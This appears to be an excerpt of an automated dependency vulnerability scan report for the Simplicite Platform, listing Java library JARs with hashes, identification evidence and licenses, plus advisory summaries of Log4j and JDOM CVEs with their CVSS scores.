jcip-annotations-1.0.jarFile Path: /var/simplicite/.m2/repository/net/jcip/jcip-annotations/1.0/jcip-annotations-1.0.jarMD5: 9d5272954896c5a5d234f66b7372b17aSHA1: afba4942caaeaf46aab0b976afd57cc7c181467eSHA256: be5805392060c71474bf6c9a67a099471274d30b83eef84bfc4e0889a4f1dcc0Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jcip-annotations High Vendor jar package name annotations Highest Vendor jar package name annotations Low Vendor jar package name jcip Highest Vendor jar package name jcip Low Vendor jar package name net Highest Vendor jar package name net Low Vendor pom artifactid jcip-annotations Highest Vendor pom artifactid jcip-annotations Low Vendor pom groupid net.jcip Highest Vendor pom name "Java Concurrency in Practice" book annotations High Vendor pom url http://jcip.net/ Highest Product file name jcip-annotations High Product jar package name annotations Highest Product jar package name annotations Low Product jar package name jcip Highest Product jar package name jcip Low Product jar package name net Highest Product pom artifactid jcip-annotations Highest Product pom groupid net.jcip Highest Product pom name "Java Concurrency in Practice" book annotations High Product pom url http://jcip.net/ Medium Version file version 1.0 High Version pom version 1.0 Highest
jcl-over-slf4j-1.7.30.jarDescription:
JCL 1.2 implemented over SLF4J License:
Apache License, Version 2.0: https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/slf4j/jcl-over-slf4j/1.7.30/jcl-over-slf4j-1.7.30.jar
MD5: 69ad224b2feb6f86554fe8997b9c3d4b
SHA1: cd92524ea19d27e5b94ecd251e1af729cffdfe15
SHA256: 71e9ee37b9e4eb7802a2acc5f41728a4cf3915e7483d798db3b4ff2ec8847c50
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jcl-over-slf4j High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name logging Highest Vendor Manifest automatic-module-name org.apache.commons.logging Medium Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname jcl.over.slf4j Medium Vendor pom artifactid jcl-over-slf4j Highest Vendor pom artifactid jcl-over-slf4j Low Vendor pom groupid org.slf4j Highest Vendor pom name JCL 1.2 implemented over SLF4J High Vendor pom parent-artifactid slf4j-parent Low Vendor pom url http://www.slf4j.org Highest Product file name jcl-over-slf4j High Product jar package name apache Highest Product jar package name commons Highest Product jar package name logging Highest Product Manifest automatic-module-name org.apache.commons.logging Medium Product Manifest Bundle-Name jcl-over-slf4j Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname jcl.over.slf4j Medium Product Manifest Implementation-Title jcl-over-slf4j High Product pom artifactid jcl-over-slf4j Highest Product pom groupid org.slf4j Highest Product pom name JCL 1.2 implemented over SLF4J High Product pom parent-artifactid slf4j-parent Medium Product pom url http://www.slf4j.org Medium Version file version 1.7.30 High Version Manifest Bundle-Version 1.7.30 High Version Manifest Implementation-Version 1.7.30 High Version pom version 1.7.30 Highest
jclouds-core-2.2.0.jarDescription:
Core components to access jclouds services License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/jclouds/jclouds-core/2.2.0/jclouds-core-2.2.0.jar
MD5: 29914e31e40bc56f933abf680e9b5954
SHA1: 488b7d20b163057e6d9767b2073714333f6c708a
SHA256: df69b0c8b13bf34465b42c1dd32b7200a9e5cf9b4cda9ea22bc5f34ad222ceec
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jclouds-core High Vendor jar package name jclouds Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname jclouds-core Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid jclouds-core Highest Vendor pom artifactid jclouds-core Low Vendor pom groupid org.apache.jclouds Highest Vendor pom name jclouds Components Core High Vendor pom parent-artifactid jclouds-project Low Product file name jclouds-core High Product jar package name http Highest Product jar package name jclouds Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds Components Core Medium Product Manifest bundle-symbolicname jclouds-core Medium Product Manifest Implementation-Title jclouds Components Core High Product Manifest specification-title jclouds jclouds Components Core Medium Product pom artifactid jclouds-core Highest Product pom groupid org.apache.jclouds Highest Product pom name jclouds Components Core High Product pom parent-artifactid jclouds-project Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
Related Dependencies jclouds-blobstore-2.2.0.jarFile Path: /var/simplicite/.m2/repository/org/apache/jclouds/jclouds-blobstore/2.2.0/jclouds-blobstore-2.2.0.jar MD5: 4c462eabbb65bd6eea749bc64931f912 SHA1: 0c0ed60ebf402f790801f164d10aff483b6c5372 SHA256: 35215cbde4636f4b0959516f74a99fb6e9807e1cd058c315e8f64758641f43cc pkg:maven/org.apache.jclouds/jclouds-blobstore@2.2.0 jclouds-gson-2.2.0.jarFile Path: /var/simplicite/.m2/repository/org/apache/jclouds/jclouds-gson/2.2.0/jclouds-gson-2.2.0.jar MD5: 0fc746e6cceab1b7b57cfd94a0d9f8c4 SHA1: 379e3820cfadf378cb76b511d005c45c7b6b3c67 SHA256: bf8c96aa90286ea63afe0d3ceaa3d44191b59ec89c5b012f3720d65538c688ee pkg:maven/org.apache.jclouds/jclouds-gson@2.2.0 jclouds-slf4j-2.2.0.jarFile Path: /var/simplicite/.m2/repository/org/apache/jclouds/driver/jclouds-slf4j/2.2.0/jclouds-slf4j-2.2.0.jar MD5: a6bcb22c606446466041b3b8272f510c SHA1: a10393a54791b04b62a995e5c605f6d771efb8cc SHA256: 7ccf7df8b397cbf54fdee68abd5a3fec55b3f560faafdb47d568fb251faf3f95 pkg:maven/org.apache.jclouds.driver/jclouds-slf4j@2.2.0 jclouds-log4j-2.2.0.jarDescription:
jclouds Log4J Logging Module License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/jclouds/driver/jclouds-log4j/2.2.0/jclouds-log4j-2.2.0.jar
MD5: fece8cd73ad778783c7afa58d1a4b512
SHA1: 20ab9d90c50e6343a2a5f023dc93a2935828005f
SHA256: 3da7521e48790521e48ebe9a70292ec2e8d180a40b8fcb6852cf0029de397d37
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jclouds-log4j High Vendor jar package name jclouds Highest Vendor jar package name log4j Highest Vendor jar package name logging Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname jclouds-log4j Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid jclouds-log4j Highest Vendor pom artifactid jclouds-log4j Low Vendor pom groupid org.apache.jclouds.driver Highest Vendor pom name jclouds Log4J Logging Module High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name jclouds-log4j High Product jar package name jclouds Highest Product jar package name log4j Highest Product jar package name logging Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds Log4J Logging Module Medium Product Manifest bundle-symbolicname jclouds-log4j Medium Product Manifest Implementation-Title jclouds Log4J Logging Module High Product Manifest specification-title jclouds jclouds Log4J Logging Module Medium Product pom artifactid jclouds-log4j Highest Product pom groupid org.apache.jclouds.driver Highest Product pom name jclouds Log4J Logging Module High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
CVE-2021-44228 suppress
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion'), CWE-502 Deserialization of Untrusted Data, CWE-20 Improper Input Validation
CVSSv2:
Base Score: HIGH (9.3) Vector: /AV:N/AC:M/Au:N/C:C/I:C/A:C CVSSv3:
Base Score: CRITICAL (10.0) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2017-5645 suppress
In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. CWE-502 Deserialization of Untrusted Data
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-45046 suppress
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default. CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
CVSSv2:
Base Score: MEDIUM (5.1) Vector: /AV:N/AC:H/Au:N/C:P/I:P/A:P CVSSv3:
Base Score: CRITICAL (9.0) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-44832 suppress
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2. CWE-20 Improper Input Validation
CVSSv2:
Base Score: HIGH (8.5) Vector: /AV:N/AC:M/Au:S/C:C/I:C/A:C CVSSv3:
Base Score: MEDIUM (6.6) Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-45105 suppress
Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1. CWE-20 Improper Input Validation, CWE-674 Uncontrolled Recursion
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2020-9488 suppress
Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender. Fixed in Apache Log4j 2.12.3 and 2.13.1 CWE-295 Improper Certificate Validation
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: LOW (3.7) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N References:
Vulnerable Software & Versions: (show all )
jcommander-1.35.jarDescription:
A Java framework to parse command line options with annotations. License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/beust/jcommander/1.35/jcommander-1.35.jar
MD5: 90216444fab67357c5bdf3293b47107e
SHA1: 47592e181b0bdbbeb63029e08c5e74f6803c4edd
SHA256: 019c12fec1ce5c02cbabb150f6ac8a86d92a0ecc9c89a549e5537283e863000c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jcommander High Vendor jar package name beust Highest Vendor jar package name jcommander Highest Vendor Manifest bundle-symbolicname com.beust.jcommander Medium Vendor pom artifactid jcommander Highest Vendor pom artifactid jcommander Low Vendor pom developer name Cedric Beust Medium Vendor pom groupid com.beust Highest Vendor pom name JCommander High Vendor pom url http://beust.com/jcommander Highest Product file name jcommander High Product jar package name beust Highest Product jar package name jcommander Highest Product Manifest Bundle-Name JCommander Medium Product Manifest bundle-symbolicname com.beust.jcommander Medium Product pom artifactid jcommander Highest Product pom developer name Cedric Beust Low Product pom groupid com.beust Highest Product pom name JCommander High Product pom url http://beust.com/jcommander Medium Version file version 1.35 High Version pom version 1.35 Highest
jdom2-2.0.6.jarDescription:
A complete, Java-based solution for accessing, manipulating,
and outputting XML data
License:
Similar to Apache License but with the acknowledgment clause removed: https://raw.github.com/hunterhacker/jdom/master/LICENSE.txt File Path: /var/simplicite/.m2/repository/org/jdom/jdom2/2.0.6/jdom2-2.0.6.jar
MD5: 86a30c9b1ddc08ca155747890db423b7
SHA1: 6f14738ec2e9dd0011e343717fa624a10f8aab64
SHA256: 1345f11ba606d15603d6740551a8c21947c0215640770ec67271fe78bea97cf5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jdom2 High Vendor jar package name jdom2 Highest Vendor manifest: org/jdom2/ Implementation-Vendor jdom.org Medium Vendor manifest: org/jdom2/adapters/ Implementation-Vendor jdom.org Medium Vendor manifest: org/jdom2/filter/ Implementation-Vendor jdom.org Medium Vendor manifest: org/jdom2/input/ Implementation-Vendor jdom.org Medium Vendor manifest: org/jdom2/output/ Implementation-Vendor jdom.org Medium Vendor manifest: org/jdom2/transform/ Implementation-Vendor jdom.org Medium Vendor manifest: org/jdom2/xpath/ Implementation-Vendor jdom.org Medium Vendor pom artifactid jdom2 Highest Vendor pom artifactid jdom2 Low Vendor pom developer email jdom@tuis.net Low Vendor pom developer email jhunter@servlets.com Low Vendor pom developer id hunterhacker Medium Vendor pom developer id rolfl Medium Vendor pom developer name Jason Hunter Medium Vendor pom developer name Rolf Lear Medium Vendor pom groupid org.jdom Highest Vendor pom name JDOM High Vendor pom organization name JDOM High Vendor pom organization url http://www.jdom.org Medium Vendor pom url http://www.jdom.org Highest Product file name jdom2 High Product jar package name adapters Highest Product jar package name filter Highest Product jar package name input Highest Product jar package name jdom2 Highest Product jar package name output Highest Product jar package name transform Highest Product jar package name xpath Highest Product manifest: org/jdom2/ Implementation-Title org.jdom2 Medium Product manifest: org/jdom2/ Specification-Title JDOM Classes Medium Product manifest: org/jdom2/adapters/ Implementation-Title org.jdom2.adapters Medium Product manifest: org/jdom2/adapters/ Specification-Title JDOM Adapter Classes Medium Product manifest: org/jdom2/filter/ Implementation-Title org.jdom2.filter Medium Product manifest: org/jdom2/filter/ Specification-Title JDOM Filter Classes Medium Product manifest: org/jdom2/input/ Implementation-Title org.jdom2.input Medium Product manifest: org/jdom2/input/ Specification-Title JDOM Input Classes Medium Product manifest: org/jdom2/output/ Implementation-Title org.jdom2.output Medium Product manifest: org/jdom2/output/ Specification-Title JDOM Output Classes Medium Product manifest: org/jdom2/transform/ Implementation-Title org.jdom2.transform Medium Product manifest: org/jdom2/transform/ Specification-Title JDOM Transformation Classes Medium Product manifest: org/jdom2/xpath/ Implementation-Title org.jdom2.xpath Medium Product manifest: org/jdom2/xpath/ Specification-Title JDOM XPath Classes Medium Product pom artifactid jdom2 Highest Product pom developer email jdom@tuis.net Low Product pom developer email jhunter@servlets.com Low Product pom developer id hunterhacker Low Product pom developer id rolfl Low Product pom developer name Jason Hunter Low Product pom developer name Rolf Lear Low Product pom groupid org.jdom Highest Product pom name JDOM High Product pom organization name JDOM Low Product pom organization url http://www.jdom.org Low Product pom url http://www.jdom.org Medium Version file version 2.0.6 High Version manifest: org/jdom2/ Implementation-Version 2.0.6 Medium Version manifest: org/jdom2/adapters/ Implementation-Version 2.0.6 Medium Version manifest: org/jdom2/filter/ Implementation-Version 2.0.6 Medium Version manifest: org/jdom2/input/ Implementation-Version 2.0.6 Medium Version manifest: org/jdom2/output/ Implementation-Version 2.0.6 Medium Version manifest: org/jdom2/transform/ Implementation-Version 2.0.6 Medium Version manifest: org/jdom2/xpath/ Implementation-Version 2.0.6 Medium Version pom version 2.0.6 Highest
CVE-2021-33813 suppress
An XXE issue in SAXBuilder in JDOM through 2.0.6 allows attackers to cause a denial of service via a crafted HTTP request. CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
jempbox-1.8.16.jarDescription:
The Apache JempBox library is an open source Java tool that implements Adobe's XMP(TM)
specification. JempBox is a subproject of Apache PDFBox.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/pdfbox/jempbox/1.8.16/jempbox-1.8.16.jar
MD5: 1cb997cdd8302c7e19131c81ba0b7ee2
SHA1: 1f41de81768ef84ca2d8cda4cb79e9272c8ee966
SHA256: ebef7cca5a5a77768e686972b4a89f0ffce7b46907fd96ac3d4f6ce2fa038055
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jempbox High Vendor jar package name apache Highest Vendor jar package name jempbox Highest Vendor jar package name xmp Highest Vendor Manifest bundle-docurl http://pdfbox.apache.org Low Vendor Manifest bundle-symbolicname org.apache.pdfbox.jempbox Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.pdfbox Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid jempbox Highest Vendor pom artifactid jempbox Low Vendor pom groupid org.apache.pdfbox Highest Vendor pom name Apache JempBox High Vendor pom parent-artifactid pdfbox-parent Low Product file name jempbox High Product jar package name apache Highest Product jar package name jempbox Highest Product jar package name xmp Highest Product Manifest bundle-docurl http://pdfbox.apache.org Low Product Manifest Bundle-Name Apache JempBox Medium Product Manifest bundle-symbolicname org.apache.pdfbox.jempbox Medium Product Manifest Implementation-Title Apache JempBox High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" Low Product Manifest specification-title Apache JempBox Medium Product pom artifactid jempbox Highest Product pom groupid org.apache.pdfbox Highest Product pom name Apache JempBox High Product pom parent-artifactid pdfbox-parent Medium Version file version 1.8.16 High Version Manifest Bundle-Version 1.8.16 High Version Manifest Implementation-Version 1.8.16 High Version pom version 1.8.16 Highest
jersey-core-1.19.1.jarDescription:
Jersey is the open source (under dual CDDL+GPL license) JAX-RS (JSR 311) production quality Reference Implementation for building RESTful Web services. License:
http://glassfish.java.net/public/CDDL+GPL_1_1.html, http://glassfish.java.net/public/CDDL+GPL_1_1.html File Path: /var/simplicite/.m2/repository/com/sun/jersey/jersey-core/1.19.1/jersey-core-1.19.1.jar
MD5: 577161779fabb561d73388d1ffc46b1f
SHA1: 04282d106f2acd5051bd9bc2935ed9a2920c9385
SHA256: 86c3b0f6b933478dfdd2486f047861dd2f68502e05e3c76c7dfa3968ea2b5532
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jersey-core High Vendor jar package name core Highest Vendor jar package name jersey Highest Vendor jar package name sun Highest Vendor jar (hint) package name oracle Highest Vendor Manifest bundle-docurl http://www.oracle.com/ Low Vendor Manifest bundle-symbolicname com.sun.jersey.core Medium Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest Implementation-Vendor-Id com.sun.jersey Medium Vendor pom artifactid jersey-core Highest Vendor pom artifactid jersey-core Low Vendor pom groupid com.sun.jersey Highest Vendor pom name jersey-core High Vendor pom parent-artifactid jersey-project Low Product file name jersey-core High Product jar package name core Highest Product jar package name jersey Highest Product jar package name sun Highest Product Manifest bundle-docurl http://www.oracle.com/ Low Product Manifest Bundle-Name jersey-core Medium Product Manifest bundle-symbolicname com.sun.jersey.core Medium Product Manifest Implementation-Title jersey-core High Product pom artifactid jersey-core Highest Product pom groupid com.sun.jersey Highest Product pom name jersey-core High Product pom parent-artifactid jersey-project Medium Version file version 1.19.1 High Version Manifest Bundle-Version 1.19.1 High Version Manifest Implementation-Version 1.19.1 High Version pom version 1.19.1 Highest
Related Dependencies jersey-client-1.19.1.jarFile Path: /var/simplicite/.m2/repository/com/sun/jersey/jersey-client/1.19.1/jersey-client-1.19.1.jar MD5: b712cd1d3bb4cef01bb6fc9d5d6ddbe8 SHA1: 2df97ebd4e5c01599584c45caa3aeb563d268eef SHA256: b358aebb99c15d9aa7dacbab8b3041618d8fe6513b9113e5fd7711421b4982d1 pkg:maven/com.sun.jersey/jersey-client@1.19.1 jersey-multipart-1.19.1.jarFile Path: /var/simplicite/.m2/repository/com/sun/jersey/contribs/jersey-multipart/1.19.1/jersey-multipart-1.19.1.jar MD5: 1180a28161df38fc3c7cd709ca1c9abb SHA1: b8700842c5005dab05831319bc8f072d51e26396 SHA256: 67d2b89091e6322f8d7072c0c4524936ba32b319b32823c51ba60ff8f72ef751 pkg:maven/com.sun.jersey.contribs/jersey-multipart@1.19.1 jfreechart-1.5.0.jarDescription:
JFreeChart is a class library, written in Java, for generating charts.
Utilising the Java2D APIs, it currently supports bar charts, pie charts,
line charts, XY-plots and time series plots.
License:
GNU Lesser General Public Licence: http://www.gnu.org/licenses/lgpl.txt File Path: /var/simplicite/.m2/repository/org/jfree/jfreechart/1.5.0/jfreechart-1.5.0.jar
MD5: 7f2c7d92183516747cbe5269fa8f2201
SHA1: bc7919249bac68c15c433ed51cb798a1bf8cd74e
SHA256: ae3788e0977723ed6769d3569c6f2003df8735eca6fc108c67ad10a62a15bc5e
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jfreechart High Vendor jar package name chart Low Vendor jar package name jfree Highest Vendor jar package name jfree Low Vendor jar package name jfreechart Highest Vendor jar package name series Highest Vendor jar package name time Highest Vendor jar package name xy Highest Vendor pom artifactid jfreechart Highest Vendor pom artifactid jfreechart Low Vendor pom developer email dave@jfree.org Low Vendor pom developer name David Gilbert Medium Vendor pom developer org Object Refinery Limited Medium Vendor pom developer org URL http://www.object-refinery.com Medium Vendor pom groupid org.jfree Highest Vendor pom name JFreeChart High Vendor pom organization name JFree.org High Vendor pom organization url http://www.jfree.org/ Medium Vendor pom url http://www.jfree.org/jfreechart/ Highest Product file name jfreechart High Product jar package name chart Low Product jar package name jfree Highest Product jar package name jfreechart Highest Product jar package name series Highest Product jar package name time Highest Product jar package name xy Highest Product pom artifactid jfreechart Highest Product pom developer email dave@jfree.org Low Product pom developer name David Gilbert Low Product pom developer org Object Refinery Limited Low Product pom developer org URL http://www.object-refinery.com Low Product pom groupid org.jfree Highest Product pom name JFreeChart High Product pom organization name JFree.org Low Product pom organization url http://www.jfree.org/ Low Product pom url http://www.jfree.org/jfreechart/ Medium Version file version 1.5.0 High Version pom version 1.5.0 Highest
jhighlight-1.0.3.jarDescription:
JHighlight is an embeddable pure Java syntax highlighting
library that supports Java, HTML, XHTML, XML and LZX
languages and outputs to XHTML.
It also supports RIFE templates tags and highlights them
clearly so that you can easily identify the difference
between your RIFE markup and the actual marked up source.
License:
CDDL, v1.0: http://www.opensource.org/licenses/cddl1.php
LGPL, v2.1 or later: http://www.opensource.org/licenses/lgpl-license.php File Path: /var/simplicite/.m2/repository/org/codelibs/jhighlight/1.0.3/jhighlight-1.0.3.jar
MD5: 318e72a07b2bbe089f0c41df45d2f484
SHA1: 88831dce3d56aa53a1bfcba78518e8939b8d4779
SHA256: 34405394e068b5d8c40ed45928ce077f8b5140bf33851a55b9cb53116ded43e5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jhighlight High Vendor jar package name fastutil Low Vendor jar package name jhighlight Highest Vendor jar package name jhighlight Low Vendor jar package name uwyn Low Vendor pom artifactid jhighlight Highest Vendor pom artifactid jhighlight Low Vendor pom groupid org.codelibs Highest Vendor pom name JHighlight High Vendor pom url codelibs/jhighlight Highest Product file name jhighlight High Product jar package name fastutil Low Product jar package name jhighlight Highest Product jar package name jhighlight Low Product pom artifactid jhighlight Highest Product pom groupid org.codelibs Highest Product pom name JHighlight High Product pom url codelibs/jhighlight High Version file version 1.0.3 High Version pom version 1.0.3 Highest
jjwt-0.4.jarLicense:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0 File Path: /var/simplicite/.m2/repository/io/jsonwebtoken/jjwt/0.4/jjwt-0.4.jar
MD5: 3c8fc46151456368494680026debae21
SHA1: 61ce246d937a0fd3acf06d3bef5fc9e3933ae812
SHA256: 64f06aa7c74916036ffe3bb96b5a1aac7d4c6c6b1914b3ea828959da2117920b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jjwt High Vendor jar package name io Highest Vendor jar package name jsonwebtoken Highest Vendor Manifest Implementation-Vendor-Id io.jsonwebtoken Medium Vendor pom artifactid jjwt Highest Vendor pom artifactid jjwt Low Vendor pom groupid io.jsonwebtoken Highest Vendor pom name JSON Web Token support for the JVM High Product file name jjwt High Product jar package name io Highest Product jar package name jsonwebtoken Highest Product Manifest Implementation-Title JSON Web Token support for the JVM High Product Manifest specification-title JSON Web Token support for the JVM Medium Product pom artifactid jjwt Highest Product pom groupid io.jsonwebtoken Highest Product pom name JSON Web Token support for the JVM High Version file version 0.4 High Version Manifest Implementation-Version 0.4 High Version pom version 0.4 Highest
jlessc-1.8.jarDescription:
A Less CSS compiler written completely in Java (pure Java). License:
MIT License: http://www.opensource.org/licenses/mit-license.php File Path: /var/simplicite/.m2/repository/de/inetsoftware/jlessc/1.8/jlessc-1.8.jar
MD5: fd47b0c7d5eb68328f681f698ea32316
SHA1: 8ca4880ced86c740fa65b3ad922c576066975e87
SHA256: 74bac7175cf637813ccc3fe951a96d1d6d8189428c5f7a97181bde1f817d1c32
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jlessc High Vendor jar package name less Highest Vendor Manifest automatic-module-name de.inetsoftware.jlessc Medium Vendor Manifest bundle-symbolicname de.inetsoftware.jlessc Medium Vendor Manifest Implementation-Vendor i-net software High Vendor pom artifactid jlessc Highest Vendor pom artifactid jlessc Low Vendor pom developer email vberlin@inetsoftware.de Low Vendor pom developer id vberlin Medium Vendor pom developer name Volker Berlin Medium Vendor pom developer org i-net software Medium Vendor pom developer org URL https://www.inetsoftware.de/ Medium Vendor pom groupid de.inetsoftware Highest Vendor pom name JLessC High Vendor pom url i-net-software/jlessc Highest Product file name jlessc High Product jar package name less Highest Product Manifest automatic-module-name de.inetsoftware.jlessc Medium Product Manifest bundle-symbolicname de.inetsoftware.jlessc Medium Product Manifest Implementation-Title JLessC, a Less CSS compiler High Product pom artifactid jlessc Highest Product pom developer email vberlin@inetsoftware.de Low Product pom developer id vberlin Low Product pom developer name Volker Berlin Low Product pom developer org i-net software Low Product pom developer org URL https://www.inetsoftware.de/ Low Product pom groupid de.inetsoftware Highest Product pom name JLessC High Product pom url i-net-software/jlessc High Version file version 1.8 High Version Manifest Bundle-Version 1.8 High Version Manifest Implementation-Version 1.8 High Version pom version 1.8 Highest
jlessc-ant-1.8.jarDescription:
Simple Apache Ant task for JLessC License:
Apache License, Version 2.0: https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/simplicite/ant/jlessc-ant/1.8/jlessc-ant-1.8.jar
MD5: 497812e55df43aec9955d8c88303c4c8
SHA1: a16cfcb7848fe42b76d5178fdb6234ec817891ed
SHA256: fd9a6a6146151674652ed353d16d835ae8308118faab3f6bccab43e59e2c8875
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jlessc-ant High Vendor jar package name ant Highest Vendor jar package name ant Low Vendor jar package name jlessc Highest Vendor jar package name simplicite Highest Vendor jar package name simplicite Low Vendor pom artifactid jlessc-ant Highest Vendor pom artifactid jlessc-ant Low Vendor pom groupid com.simplicite Highest Vendor pom groupid com.simplicite.ant Highest Vendor pom name JLessC Ant task High Vendor pom organization name Simplicite Software High Vendor pom organization url https://www.simplicite.io Medium Product file name jlessc-ant High Product jar package name ant Highest Product jar package name ant Low Product jar package name jlessc Highest Product jar package name jlessc Low Product jar package name simplicite Highest Product pom artifactid jlessc-ant Highest Product pom groupid com.simplicite Highest Product pom name JLessC Ant task High Product pom organization name Simplicite Software Low Product pom organization url https://www.simplicite.io Low Version file version 1.8 High Version pom version 1.8 Highest
jmatio-1.5.jarDescription:
Matlab's MAT-file I/O API in JAVA. Supports Matlab 5 MAT-flie format reading and writing. Written in pure JAVA. License:
BSD: http://www.linfo.org/bsdlicense.html File Path: /var/simplicite/.m2/repository/org/tallison/jmatio/1.5/jmatio-1.5.jar
